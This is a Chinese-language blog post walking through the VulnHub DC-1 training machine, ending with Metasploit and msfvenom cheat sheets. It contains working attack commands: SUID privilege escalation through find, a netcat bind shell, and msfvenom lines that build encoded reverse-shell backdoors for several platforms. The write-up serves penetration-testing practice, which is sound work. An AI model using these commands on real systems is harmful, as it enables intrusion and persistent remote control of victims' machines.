<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/cat-32*32.ico">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/cat-32*32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/cat-16*16.ico">
  <link rel="mask-icon" href="/images/cat-32*32.ico" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"lycshub.github.io","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":true,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="vulnhub的DC-1靶机">
<meta property="og:type" content="article">
<meta property="og:title" content="vulnhub-DC-1">
<meta property="og:url" content="https://lycshub.github.io/2021/11/18/vulnhub-DC-1/index.html">
<meta property="og:site_name" content="Lyc&#39;s Blog">
<meta property="og:description" content="vulnhub的DC-1靶机">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://github.com/LycsHub/ImageHosting/raw/master/1637215364734-2021-11-1814:02:44.png">
<meta property="og:image" content="https://github.com/LycsHub/ImageHosting/raw/master/1637216977266-2021-11-1814:29:37.png">
<meta property="og:image" content="https://github.com/LycsHub/ImageHosting/raw/master/1637217050571-2021-11-1814:30:50.png">
<meta property="og:image" content="https://github.com/LycsHub/ImageHosting/raw/master/1637217193058-2021-11-1814:33:13.png">
<meta property="og:image" content="https://github.com/LycsHub/ImageHosting/raw/master/1637217496023-2021-11-1814:38:16.png">
<meta property="og:image" content="https://github.com/LycsHub/ImageHosting/raw/master/1637217659243-2021-11-1814:40:59.png">
<meta property="og:image" content="https://github.com/LycsHub/ImageHosting/raw/master/1637218563889-2021-11-1814:56:03.png">
<meta property="og:image" content="https://github.com/LycsHub/ImageHosting/raw/master/1637218903312-2021-11-1815:01:43.png">
<meta property="og:image" content="https://github.com/LycsHub/ImageHosting/raw/master/1637219289828-2021-11-1815:08:09.png">
<meta property="og:image" content="https://github.com/LycsHub/ImageHosting/raw/master/1637219397600-2021-11-1815:09:57.png">
<meta property="og:image" content="https://github.com/LycsHub/ImageHosting/raw/master/1637221110464-2021-11-1815:38:30.png">
<meta property="og:image" content="https://github.com/LycsHub/ImageHosting/raw/master/1637221830965-2021-11-1815:50:30.png">
<meta property="article:published_time" content="2021-11-18T06:03:48.000Z">
<meta property="article:modified_time" content="2022-03-28T11:46:15.000Z">
<meta property="article:author" content="Harry Smith">
<meta property="article:tag" content="渗透">
<meta property="article:tag" content="vulnhub">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/LycsHub/ImageHosting/raw/master/1637215364734-2021-11-1814:02:44.png">

<link rel="canonical" href="https://lycshub.github.io/2021/11/18/vulnhub-DC-1/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>vulnhub-DC-1 | Lyc's Blog</title>
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-212139889-1"></script>
    <script>
      if (CONFIG.hostname === location.hostname) {
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'UA-212139889-1');
      }
    </script>






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Lyc's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://lycshub.github.io/2021/11/18/vulnhub-DC-1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://raw.githubusercontent.com/LycsHub/ImageHosting/master/natumetakasi-2021-11-318%3A56%3A10.jpg">
      <meta itemprop="name" content="Harry Smith">
      <meta itemprop="description" content="取次花丛懒回顾，半缘修道半缘君">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Lyc's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          vulnhub-DC-1
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2021-11-18 14:03:48" itemprop="dateCreated datePublished" datetime="2021-11-18T14:03:48+08:00">2021-11-18</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2022-03-28 19:46:15" itemprop="dateModified" datetime="2022-03-28T19:46:15+08:00">2022-03-28</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a>
                </span>
            </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Disqus: </span>
    
    <a title="disqus" href="/2021/11/18/vulnhub-DC-1/#disqus_thread" itemprop="discussionUrl">
      <span class="post-comments-count disqus-comment-count" data-disqus-identifier="2021/11/18/vulnhub-DC-1/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>vulnhub的DC-1靶机</p>
<span id="more"></span>



<h3 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h3><p><img src="https://github.com/LycsHub/ImageHosting/raw/master/1637215364734-2021-11-1814:02:44.png"></p>
<h3 id="漏洞发现"><a href="#漏洞发现" class="headerlink" title="漏洞发现"></a>漏洞发现</h3><p>用msf找一找这个框架的漏洞</p>
<p><img src="https://github.com/LycsHub/ImageHosting/raw/master/1637216977266-2021-11-1814:29:37.png"></p>
<p>进入交互式shell</p>
<p><img src="https://github.com/LycsHub/ImageHosting/raw/master/1637217050571-2021-11-1814:30:50.png"></p>
<p>得到一个提示</p>
<p><img src="https://github.com/LycsHub/ImageHosting/raw/master/1637217193058-2021-11-1814:33:13.png"></p>
<p>搜一搜这个cms的配置文件</p>
<p><img src="https://github.com/LycsHub/ImageHosting/raw/master/1637217496023-2021-11-1814:38:16.png"></p>
<p>访问这个配置文件</p>
<p><img src="https://github.com/LycsHub/ImageHosting/raw/master/1637217659243-2021-11-1814:40:59.png"></p>
<p>由msf创建出来的是不能直接进行交互的，只是一个shell</p>
<p><strong>创一个交互式命令行</strong></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &#x27;import pty;pty.spawn(&quot;/bin/bash&quot;)&#x27;`</span><br></pre></td></tr></table></figure>
<h3 id="数据库修改用户密码"><a href="#数据库修改用户密码" class="headerlink" title="数据库修改用户密码"></a>数据库修改用户密码</h3><p>数据库里看了看user,然后准备登录下admin账户，hash过的密码，需要找他的加密函数</p>
<p>找到这个可以生成</p>
<p><img src="https://github.com/LycsHub/ImageHosting/raw/master/1637218563889-2021-11-1814:56:03.png"></p>
<p>生成一下直接去数据库里改密码hash</p>
<p><img src="https://github.com/LycsHub/ImageHosting/raw/master/1637218903312-2021-11-1815:01:43.png"></p>
<p>改完密码后登录，在dashborad里面找到第三个提示</p>
<p><img src="https://github.com/LycsHub/ImageHosting/raw/master/1637219289828-2021-11-1815:08:09.png"></p>
<p>根据提示找一下这个shadow</p>
<p>在/etc下面</p>
<p><img src="https://github.com/LycsHub/ImageHosting/raw/master/1637219397600-2021-11-1815:09:57.png"></p>
<p>但是执行不了，提示权限不够</p>
<p>找到当前系统所有的suid可执行文件</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -type f 2&gt;/dev/null </span><br><span class="line">find / -user root -perm -4000-print2&gt;/dev/null </span><br><span class="line">find / -user root -perm -4000-exec ls -ldb &#123;&#125; \;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<p>然后利用find提权</p>
<p><code>find /root/thefinalflag.txt -exec cat &#123;&#125; \;</code></p>
<p>读取了root家目录下的最后flag文件</p>
<p><img src="https://github.com/LycsHub/ImageHosting/raw/master/1637221110464-2021-11-1815:38:30.png"></p>
<h3 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h3><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/usr/bin/find /root/thefinalflag.txt -exec netcat -lvp 4444 -e &quot;/bin/sh&quot;  \;</span><br></pre></td></tr></table></figure>



<p>关于反弹shell ,利用上面的原理可以弹一个shell会攻击机</p>
<p><img src="https://github.com/LycsHub/ImageHosting/raw/master/1637221830965-2021-11-1815:50:30.png"></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>熟悉了一下相关工具的使用，还有渗透的思路</p>
<p>参考</p>
<p><a target="_blank" rel="noopener" href="https://www.bilibili.com/read/cv8951424">https://www.bilibili.com/read/cv8951424</a></p>
<p><a target="_blank" rel="noopener" href="https://infosecwriteups.com/vulnhub-writeup-dc-1-37dcf92b456a">https://infosecwriteups.com/vulnhub-writeup-dc-1-37dcf92b456a</a></p>
<p><a target="_blank" rel="noopener" href="https://lnng.top/posts/2ea3.html#toc-heading-11">https://lnng.top/posts/2ea3.html#toc-heading-11</a></p>
<hr>
<h4 id="msf的使用方法"><a href="#msf的使用方法" class="headerlink" title="msf的使用方法"></a>msf的使用方法</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#</span><span class="bash">进入命令行工具</span></span><br><span class="line">msfconsole</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 搜索漏洞名称</span></span><br><span class="line">search [组件或者漏洞关键词]</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 使用漏洞</span></span><br><span class="line">use [漏洞路径]</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash"> 查看需要输入的选项</span></span><br><span class="line">options</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash">然后设置options列出来的选项</span></span><br><span class="line">set [选项键]　[选项值]</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">#</span><span class="bash">设置完所有的参数</span></span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<h4 id="后门生成的模块msfvenom"><a href="#后门生成的模块msfvenom" class="headerlink" title="后门生成的模块msfvenom"></a>后门生成的模块msfvenom</h4><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line">普通生成</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        msfvenom -p 有效载荷 -f 输出格式 -o 输出文件</span><br><span class="line"></span><br><span class="line">        msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe</span><br><span class="line"></span><br><span class="line">编码生成</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        msfvenom -a 系统架构 --platform 系统平台 -p 有效载荷 lhost=攻击机IP lport=攻击机端口 -e 编码方式 -i编码次数 -f 输出格式 -o 输出文件</span><br><span class="line"></span><br><span class="line">        msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.1 lport=8888 -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">msfvenom —list archs #查看支持的系统架构</span><br><span class="line"></span><br><span class="line">        aarch64, armbe, armle, cbea, cbea64, cmd, dalvik, firefox, java, mips, mips64, mips64le, mipsbe, mipsle, nodejs, php, ppc, ppc64, ppc64le, ppce500v2, python, r, ruby, sparc, sparc64, tty, x64, x86, x86_64, zarch</span><br><span class="line"></span><br><span class="line">msfvenom —list platforms #查看支持系统平台</span><br><span class="line"></span><br><span class="line">        aix, android, apple_ios, bsd, bsdi, cisco, firefox, freebsd, hardware, hpux, irix, java, javascript, juniper, linux, mainframe, multi, netbsd, netware, nodejs, openbsd, osx, php, python, r, ruby, solaris, unifi, unix, unknown, windows</span><br><span class="line"></span><br><span class="line">msfvenom -l payload #列出所有可用的payload</span><br><span class="line"></span><br><span class="line">msfvenom -l formats #列出所有的输出格式</span><br><span class="line"></span><br><span class="line">msfvenom -l encrypt #列出所有的加密方式</span><br><span class="line"></span><br><span class="line">msfvenom -l encoders #列出所有的编码器</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">常见生成格式</span><br><span class="line"></span><br><span class="line">1、 Windows</span><br><span class="line"></span><br><span class="line">        msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp -i 3 -e x86/shikata_ga_nai -f exe -o payload.exe</span><br><span class="line"></span><br><span class="line">2、Linux</span><br><span class="line"></span><br><span class="line">        msfvenom --platform linux -a x86 -p linux/x86/meterpreter/reverse_tcp -f elf -o payload.elf</span><br><span class="line"></span><br><span class="line">3、Mac</span><br><span class="line"></span><br><span class="line">        msfvenom --platform osx -a x86 -p osx/x86/shell_reverse_tcp -f macho -o payload.macho</span><br><span class="line"></span><br><span class="line">4、Android</span><br><span class="line"></span><br><span class="line">        msfvenom -p android/meterpreter/reverse_tcp -o payload.apk</span><br><span class="line"></span><br><span class="line">5、Aspx</span><br><span class="line"></span><br><span class="line">        msfvenom --platform windows-p windows/meterpreter/reverse_tcp -f aspx -o payload.aspx</span><br><span class="line"></span><br><span class="line">6、JSP</span><br><span class="line"></span><br><span class="line">        msfvenom --platform java -p java/jsp_shell_reverse_tcp -f raw -o payload.jsp</span><br><span class="line"></span><br><span class="line">7、PHP</span><br><span class="line"></span><br><span class="line">        msfvenom -p php/meterpreter_reverse_tcp -f raw -o payload.php</span><br><span class="line"></span><br><span class="line">8、BASH</span><br><span class="line"></span><br><span class="line">        msfvenom -p cmd/unix/reverse_bash -f raw -o shell.sh</span><br><span class="line"></span><br><span class="line">9、Python</span><br><span class="line"></span><br><span class="line">        msfvenom -p python/meterpreter/reverse_tcp -f raw -o shell.py</span><br></pre></td></tr></table></figure>


    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F/" rel="tag"># 渗透</a>
              <a href="/tags/vulnhub/" rel="tag"># vulnhub</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/11/17/%E7%88%86%E7%A0%B4%E5%90%8E%E5%8F%B0-htpwdScan/" rel="prev" title="爆破后台-htpwdScan">
      <i class="fa fa-chevron-left"></i> 爆破后台-htpwdScan
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/11/18/screen%E4%BD%BF%E7%94%A8/" rel="next" title="screen使用">
      screen使用 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    
  <div class="comments">
    <div id="disqus_thread">
      <noscript>Please enable JavaScript to view the comments powered by Disqus.</noscript>
    </div>
  </div>
  

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0"><span class="nav-number">1.</span> <span class="nav-text">主机发现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%8F%91%E7%8E%B0"><span class="nav-number">2.</span> <span class="nav-text">漏洞发现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BF%AE%E6%94%B9%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81"><span class="nav-number">3.</span> <span class="nav-text">数据库修改用户密码</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%8F%8D%E5%BC%B9shell"><span class="nav-number">4.</span> <span class="nav-text">反弹shell</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">5.</span> <span class="nav-text">总结</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#msf%E7%9A%84%E4%BD%BF%E7%94%A8%E6%96%B9%E6%B3%95"><span class="nav-number">5.1.</span> <span class="nav-text">msf的使用方法</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%90%8E%E9%97%A8%E7%94%9F%E6%88%90%E7%9A%84%E6%A8%A1%E5%9D%97msfvenom"><span class="nav-number">5.2.</span> <span class="nav-text">后门生成的模块msfvenom</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Harry Smith"
      src="https://raw.githubusercontent.com/LycsHub/ImageHosting/master/natumetakasi-2021-11-318%3A56%3A10.jpg">
  <p class="site-author-name" itemprop="name">Harry Smith</p>
  <div class="site-description" itemprop="description">取次花丛懒回顾，半缘修道半缘君</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">42</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">24</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry Smith</span>
</div>

        








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="//cdn.jsdelivr.net/gh/theme-next/theme-next-canvas-ribbon@1/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/medium-zoom@1/dist/medium-zoom.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script>
  function loadCount() {
    var d = document, s = d.createElement('script');
    s.src = 'https://harrysmith-1.disqus.com/count.js';
    s.id = 'dsq-count-scr';
    (d.head || d.body).appendChild(s);
  }
  // defer loading until the whole page loading is completed
  window.addEventListener('load', loadCount, false);
</script>
<script>
  var disqus_config = function() {
    this.page.url = "https://lycshub.github.io/2021/11/18/vulnhub-DC-1/";
    this.page.identifier = "2021/11/18/vulnhub-DC-1/";
    this.page.title = "vulnhub-DC-1";
    };
  NexT.utils.loadComments(document.querySelector('#disqus_thread'), () => {
    if (window.DISQUS) {
      DISQUS.reset({
        reload: true,
        config: disqus_config
      });
    } else {
      var d = document, s = d.createElement('script');
      s.src = 'https://harrysmith-1.disqus.com/embed.js';
      s.setAttribute('data-timestamp', '' + +new Date());
      (d.head || d.body).appendChild(s);
    }
  });
</script>

</body>
</html>
